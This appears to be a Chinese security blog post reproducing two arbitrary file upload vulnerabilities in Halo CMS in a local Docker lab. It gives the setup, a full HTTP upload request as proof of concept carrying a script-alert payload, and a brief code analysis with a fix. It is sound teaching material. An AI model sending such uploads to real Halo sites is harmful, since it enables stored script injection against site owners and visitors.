【漏洞复现】CVE-2022-26619 & CVE-2022-32994 Arbitrary File Upload

已于 2024-12-12 12:32:50 修改
阅读量883 收藏 5
点赞数 16
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: halo 网络安全 漏洞复现 docker
于 2024-12-11 21:38:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mitchell_Donovan/article/details/144410539

漏洞信息

NVD - CVE-2022-26619

Halo Blog CMS v1.4.17 was discovered to allow attackers to upload arbitrary files via the Attachment Upload function.

NVD - CVE-2022-32994

Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.

背景介绍

Halo is an open-source, self-hosted blog platform built with Java. It is designed to be simple, fast, and flexible, allowing users to create and manage blogs with ease. Halo offers a clean and modern user interface, supports Markdown for writing posts, and provides various customization options such as themes and plugins.

• 主页:https://www.halo.run/

• 源码:https://github.com/halo-dev/halo

环境搭建

$ docker pull swimminghao/halo:1.5.3
$ docker run -d \
  -p 8090:8090 \
  swimminghao/halo:1.5.3

先访问http://127.0.0.1:8090/会直接跳转到安装向导,按照提示完成安装:

Web UI: http://127.0.0.1:8090/admin/index.html#/login

账号密码:admin / 88888888

漏洞复现

文件上传漏洞所以先准备好上传的脚本:

$ touch hacked.jsp
$ echo "<script>alert(\"You are hacked\!\")</script>" > hacked.jsp

这是个简单的js脚本,打开就可以弹窗测试是否被javascript解析:
在这里插入图片描述

两个漏洞差不多,只是前端API不一样:

CVE-2022-26619:附件→上传,上传附件

CVE-2022-32994:外观→主题设置→样式设置,上传文件

在这里插入图片描述

抓包信息如下,发包后可以得到回显PATH:

在这里插入图片描述

POC:

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Admin-Authorization: 8fb5b0e9619e4f1b87202985e6916c6b
Content-Type: multipart/form-data; boundary=---------------------------173360575825736325452909371224
Content-Length: 279
Origin: http://127.0.0.1:8090
Connection: keep-alive
Referer: http://127.0.0.1:8090/admin/index.html
Cookie: JSESSIONID=node01ntfyvfpqwkqs1hd6cxvgk8qmy1.node0

-----------------------------173360575825736325452909371224
Content-Disposition: form-data; name="file"; filename="hacked.jsp"
Content-Type: application/octet-stream

<script>alert("You are hacked\!")</script>

-----------------------------173360575825736325452909371224--

按照回显的PATH能够访问文件,而且文件被javascript前端解析:

在这里插入图片描述

漏洞分析

source位于run.halo.app.controller.admin.api.AttachmentController#uploadAttachment,通过POST请求:
在这里插入图片描述

sink位于run.halo.app.service.impl.AttachmentServiceImpl#create:

在这里插入图片描述

污点从source到达sink之前,仅仅经历了一个Assert.notNull过滤确保文件不为空,在run.halo.app.service.impl.AttachmentServiceImpl#upload中:

在这里插入图片描述

修复方案

对上传的Attachment对象进行全面的安全检查。

CVE-2022-26923 ADCS权限提升漏洞
渗透之路,攻防之间皆学问
05-22 5190
CVE-2022-26923是一个影响微软Active Directory证书服务(AD CS)的权限提升漏洞
WordPress File Upload 插件 任意文件读取漏洞复现(CVE-2024-9047)
0xSec
12-24 1204
WordPress File Upload 插件,在小于或等于4.24.11版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
nginx 缓冲区错误漏洞(CVE-2022-41741)修复
LIARRR的博客
11-19 4547
Nginx在 ngx_http_mp4_module 中存在漏洞,这可能允许攻击者激发 worker 进程的崩溃,或者通过使用特制的 mp4 文件致使 worker 进程出现内存泄露。该问题仅影响启用了 ngx_http_mp4_module 模块(默认不启用)并在配置文件中使用 .mp4 指令的 NGINX。此外,只有当攻击者能够触发使用 ngx_http_mp4_module 对特制 mp4 文件的进行处理时,攻击才有可能成功。升级nginx到1.25.4版本。
春秋云境:CVE-2022-25099(文件上传造成RCE)
m0_65712192的博客
04-22 1204
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
WBCE CMS任意文件上传漏洞CVE-2022-25099)
weixin_68999845的博客
07-21 1520
WBCE CMS 存在安全漏洞,该漏洞源于 /languages/index.php 中的漏洞允许攻击者通过精心设计的 PHP 文件执行任意代码。源码下载url:https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.5.2.zip。上传路径为 /admin/languages/install.php,在post body部分可以看到明显的恶意payload。1.按照源码下载:https://github.com/WBCE/WBCE_CMS。
春秋云境:CVE-2022-25099
一只爱吃橙子的羊
12-01 1660
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
CVE-2020-11023】——漏洞复现、原理分析以及漏洞修复
IronmanJay
10-27 9159
在jQuery版本1.0.3到3.5.0之间(包括1.0.3,但不包括3.5.0),将包含``元素的HTML(即使已进行消毒处理)从不受信任的来源传递给jQuery的某些DOM操作方法(如`.html()`、`.append()`等)可能会导致执行不受信任的代码。该问题在jQuery 3.5.0中已得到修复。
ImageMagick任意文件读取漏洞(CVE-2022-44268)
god_Zeo的安全博客
02-12 4714
爆出一个 ImageMagick 漏洞 CVE-2022-44268 ,在ImageMagick 7.1.0-51版本及以前 ,可以造成一个任意文件读取的危害比较可观,最近有时间来复现学习一下
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)
0xSec
04-07 1784
Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
Apache Struts 存在远程代码执行漏洞(CVE-2024-53677)
缘梦未来的博客
12-14 1065
Apache Struts 是一个开源的 Java Web 应用框架,最初由 Craig McClanahan 于 2000 年创建,并被 Apache 软件基金会接管。它主要用于开发基于 Java 的企业级 Web 应用程序。Struts 提供了一个 MVC(Model-View-Controller)架构,帮助开发者将应用的逻辑分离,以提高可维护性和可扩展性。
Cisco IOS XE WLC 任意文件上传漏洞复现CVE-2025-20188)
最新发布
iSee857的博客
06-04 712
漏洞是由于受影响的系统上存在硬编码的 JSON Web 令牌 (JWT) 造成的。攻击者可以通过向 AP 镜像下载接口发送精心编制的 HTTPS 请求来利用此漏洞。成功利用此漏洞可让攻击者以 root 权限上传文件、执行路径遍历和执行任意命令。(CVE-2025-20188)
分享几个CVE漏洞复现
xnxqwzy的博客
03-27 783
对网站设置域名解析点击此处一个登录界面,发现系统版本,查找历史漏洞,发现一个文件上传RCE漏洞下载下来查看参考文章:https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE可以拿到shell,但是无法切换成交互模式换另一种方式,登录管理面板,密码为维吉尼亚解密密码成功登录,是管理员,点击设置查看进入后台,因为上面搜出来了文件上传RCE漏洞,所以找一找文件上传点发现此处,可以进行文件上传点击该处可以上传先上传一个txt文件试试,上传成功。
WBCE CMS v1.5.2 远程命令执行漏洞CVE-2022-25099)
Flag少侠的博客
07-05 9629
打开靶场访问显示正在建设中网上去找这个 CMS 的版本源码需要加上 /admin/login/ 进入登录页面用户名密码弱口令:admin/123456在 Add-ons 中找到 Languages点进去可以看到上传文件选择好一句话木马文件打开 BurpSuite 开启拦截,将类型修改为图片报错了?修改下内容重新尝试可以看到被正常解析了,说明一句话木马不可行,但是可以在这个文件中执行命令成功拿到 flag。
网络安全CVE漏洞分析以及复现
Android_wxf的博客
04-21 1962
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
CVE漏洞复现-CVE-2023-32233 NetFilter权限提升
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-06 4568
Netfilter是Linux 内核中的网络数据包处理框架(iptables)通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理具体,详情请见。
漏洞复现--SysAid On-premise远程代码执行(CVE-2023-47246)
qq_53003652的博客
12-18 1474
SysAid On-premise 提供了诸如故障报告、资产管理、服务台支持、自动化流程等功能,以帮助 IT 团队更高效地工作。这种部署模式可以满足那些对数据安全性有更高要求的组织,同时也提供了更多的自定义和控制能力,以适应特定的业务需求和流程。该产品存在远程代码执行。
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 6822
通过exp实现了对微软目前存在的office-word-2016的成功复现
CVE-2016-5734漏洞复现
qq_56426046的博客
09-11 547
在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞
漏洞重现:学习编程并进行CVE漏洞复现
ByteCodN的博客
09-18 567
漏洞复现是指通过编写代码或使用特定的工具来模拟和重现已知的漏洞,以便深入研究漏洞的原理和影响,并为其修复提供参考。编程是一项需要不断实践和探索的技能,通过不断学习和实践,我们可以提高自己在编程和漏洞复现方面的技能。首先,让我们选择一个CVE漏洞复现。为了使漏洞复现更具挑战性和有意义,我们可以尝试修改代码,使其更接近真实环境中的漏洞利用场景。请注意,在实际的漏洞复现过程中,我们需要更详细和复杂的代码来模拟真实的漏洞条件。请注意,这里的代码只是一个示例,实际的CVE漏洞复现可能需要更多的工作和技术细节。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值